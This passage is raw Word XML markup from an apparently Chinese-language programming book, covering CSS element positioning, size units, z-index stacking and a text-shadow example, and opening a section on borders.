        <w:t>以外的值，就可以通过元素的</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>right</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>bottom</w:t>
      </w:r>
      <w:r>
        <w:t>属性的一些组合指定元素的位置。最常用的定位技术是使用</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定元素的左边缘到容器（通常是文档本身）左边缘的距离，元素的上边缘到容器上边缘的距离。例如，要放置一个距离文档左、上边缘各</w:t>
      </w:r>
      <w:r>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:t>像素的元素，可以在</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性中指定如下</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div style="position</w:t>
      </w:r>
      <w:r>
        <w:t>:absolute;left:100px;top:100px;"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果元素使用绝对定位，它的</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>属性应该解释为它是相对于其</w:t>
      </w:r>
      <w:r>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为除</w:t>
      </w:r>
      <w:r>
        <w:t>static</w:t>
      </w:r>
      <w:r>
        <w:t>值以外的祖先元素。如果绝对定位的元素没有定位过的祖先，则它的</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>属性使用文档</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>坐标进行度量</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>就是相对于文档左上角的偏移量。如果你想相对于一个属于常规文档流中的容器绝对定位一个元素，则将容器的</w:t>
      </w:r>
      <w:r>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:t>指定为</w:t>
      </w:r>
      <w:r>
        <w:t>relative</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>指定为</w:t>
      </w:r>
      <w:r>
        <w:t>0px</w:t>
      </w:r>
      <w:r>
        <w:t>。这就让容器变成了动态定位，但它仍留在文档流中原来的位置。任何绝</w:t>
      </w:r>
      <w:r>
        <w:t>对定位元素的子元素都相对于容器进行定位。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>虽然使用</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>指定元素的左上角位置是最常见的定位方法，但也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>bottom</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>right</w:t>
      </w:r>
      <w:r>
        <w:t>指定元素相对于容器的下和右边缘进行定位。例如，让一个元素的右下角就在文档的右下角进行定位（假设元素没有嵌套在其他动态元素中），使用如下样式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>position:absolute;right:0px;bottom:0px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>定位一个元素让其右、上边缘相对于窗口右、上边缘各</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>像素，并且不随文档的滚动而滚动，可以使用如下样式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>position:fixed;righ</w:t>
      </w:r>
      <w:r>
        <w:t>t:10px;top:10px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了定位元素以外，</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>允许指定它们的尺寸。这通常通过指定</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>样式属性的值完成。例如，以下</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>代码创建了</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一个绝对定位的空元素。它的</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>background-color</w:t>
      </w:r>
      <w:r>
        <w:t>属性使得它看上去显示为一个蓝色的小方块：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div style="position:absolute;top:10px;left:10px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>width:10px;height:10px;background-color:blue"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另外一种指定元素的宽度的方法是同时指定</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>right</w:t>
      </w:r>
      <w:r>
        <w:t>属性。同样，通过指定</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>bottom</w:t>
      </w:r>
      <w:r>
        <w:t>属性来指定元素的高度。但是，如果同时指定</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>right</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>，那么</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>属性将覆盖</w:t>
      </w:r>
      <w:r>
        <w:t>right</w:t>
      </w:r>
      <w:r>
        <w:t>属性；如果元素的高度重复限定，</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性优先于</w:t>
      </w:r>
      <w:r>
        <w:t>bottom</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>请牢记，没必要给每一个动态元素指定尺寸，某些元素（如图片）具有固有尺寸。而且，对包含文本或其他流式内容的动态元素通常指定想要的宽度就足够了，让元素内容布局来自动决定它的高度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>指定位置和大小属性是有单位的。在上面的例子中，定位和</w:t>
      </w:r>
      <w:r>
        <w:t>尺寸属性值以</w:t>
      </w:r>
      <w:r>
        <w:t>"px"</w:t>
      </w:r>
      <w:r>
        <w:t>结尾，代表像素。也可以使用英寸（</w:t>
      </w:r>
      <w:r>
        <w:t>"in"</w:t>
      </w:r>
      <w:r>
        <w:t>）、厘米（</w:t>
      </w:r>
      <w:r>
        <w:t>"cm"</w:t>
      </w:r>
      <w:r>
        <w:t>）、点（</w:t>
      </w:r>
      <w:r>
        <w:t>"pt"</w:t>
      </w:r>
      <w:r>
        <w:t>）和字体行高（</w:t>
      </w:r>
      <w:r>
        <w:t>"em"</w:t>
      </w:r>
      <w:r>
        <w:t>，一种当前字体行高的度量）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>相对于使用上面的单位来指定绝对定位和尺寸，</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>也允许指定元素的位置和尺寸为其容器元素的百分比。例如，以下</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>代码创建了一个黑边框空元素，它的宽度和高度为其容器元素（或是浏览器窗口）的</w:t>
      </w:r>
      <w:r>
        <w:t>50%</w:t>
      </w:r>
      <w:r>
        <w:t>，居中显示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div style="position:absolute;left:25%;top:25%;width:50%;height:50%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>border:2p</w:t>
      </w:r>
      <w:r>
        <w:t>x solid black"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>第三个维度：</w:t>
      </w:r>
      <w:r>
        <w:t>z-index</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如你所见，</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>right</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>bottom</w:t>
      </w:r>
      <w:r>
        <w:t>属性是在容器元素中的二维坐标中指定</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标。</w:t>
      </w:r>
      <w:r>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义了第三个维度：它允许指定元素的堆叠次序，并指示两个或多个重叠元素中的哪一个应该绘制在其他的上面。</w:t>
      </w:r>
      <w:r>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:t>默认为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，可以是正或负的整数。当两个或多个元素重叠在一起时，它们是按照从低到高的</w:t>
      </w:r>
      <w:r>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:t>顺序绘制的。如果重叠元素的</w:t>
      </w:r>
      <w:r>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:t>值一样，它们按照在文档中出现的顺序绘制，也即最后一个重叠的元素显示在最上面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:t>只对兄弟元素（例如，同一个容器的子元素）应用堆叠效</w:t>
      </w:r>
      <w:r>
        <w:t>果。如果两个元素不是兄弟元素之间的重叠，那么设置</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>它们的</w:t>
      </w:r>
      <w:r>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:t>属性无法决定哪一个显示在最上面。相反，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>必须</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>设置这两个重叠元素的兄弟容器的</w:t>
      </w:r>
      <w:r>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:t>属性来达到目的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>非定位元素（例如，默认使用</w:t>
      </w:r>
      <w:r>
        <w:t>position:static</w:t>
      </w:r>
      <w:r>
        <w:t>定位）总是以防止重叠的方式进行布局，因此</w:t>
      </w:r>
      <w:r>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:t>属性不会应用到它们上面。尽管如此，它们默认的</w:t>
      </w:r>
      <w:r>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:t>值为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，这意味着</w:t>
      </w:r>
      <w:r>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:t>为正值的定位元素显示在常规文档流的上面，而</w:t>
      </w:r>
      <w:r>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:t>为负值的定位元素显示在常规文档流的下面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>2.CSS</w:t>
      </w:r>
      <w:r>
        <w:t>定位示例：文本阴影</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>规</w:t>
      </w:r>
      <w:r>
        <w:t>范包含一个</w:t>
      </w:r>
      <w:r>
        <w:t>text-shadow</w:t>
      </w:r>
      <w:r>
        <w:t>属性以在文本下产生阴影效果。许多现在的浏览器都支持该效果，但是可以用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>定位属性实现类似的效果，只要重复输出这段文本并重新定义以下样式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--text-shadow</w:t>
      </w:r>
      <w:r>
        <w:t>属性自动产生阴影效果</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>span style="text-shadow:3px 3px 1px#888"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Shadowed</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/span</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>这里我们利用定位可以产生相同的效果</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>span style="position:relative;"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Shadowed</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>这里是投射阴影的文本</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>span style="position:absolute;top:3px;left:3px;z-index:-1;color:#888"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Shadowed</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>这里是阴影</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/span</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/span</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>需要投射阴影的文本包裹在相对定位的＜</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签中，不用设置其他定位属性，所以文本显示在其正常的位置上。阴影位于一个绝对定位的＜</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>＞中，它包含在上面那个相对定位的＜</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>＞中，这样</w:t>
      </w:r>
      <w:r>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:t>属性确保阴影在其文本的下面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="408" w:name="16_2_2_Bian_Kuang___Wai_Bian_Ju_He_Nei_B"/>
      <w:r>
        <w:t>16.2.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　边框、外边距和内边距</w:t>
      </w:r>
      <w:bookmarkEnd w:id="408"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>允许指定元素周围的边框、外边距和内边距。元素的边框是一个围绕（或部分围绕）元素绘制的矩形（或者</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>中的圆角矩形）。属性还允许指定边框的样式、颜色和厚度：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>border:solid black 1px;/*</w:t>
      </w:r>
      <w:r>
        <w:t>绘制一个</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>像素的黑色实线边框</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>border:3px dotted red;/*</w:t>
      </w:r>
      <w:r>
        <w:t>绘制一个</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>像素的红色点线边框</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以用单独的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定边框的宽度、样式和颜色，也可以指定元素的每条边的边框。例如，要绘制元素下面的一条线，只要简单地指定它的</w:t>
      </w:r>
      <w:r>
        <w:t>border-bottom</w:t>
      </w:r>
      <w:r>
        <w:t>属性。甚至可以为元素的单</w:t>
      </w:r>
      <w:r>
        <w:t>条边指定宽度、样式和颜色，如</w:t>
      </w:r>
      <w:r>
        <w:t>border-top-width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>border-left-color</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>中，可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>border-radius</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定圆滑边框的所有角，也可以用更明确的属性名设置单独的圆角。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
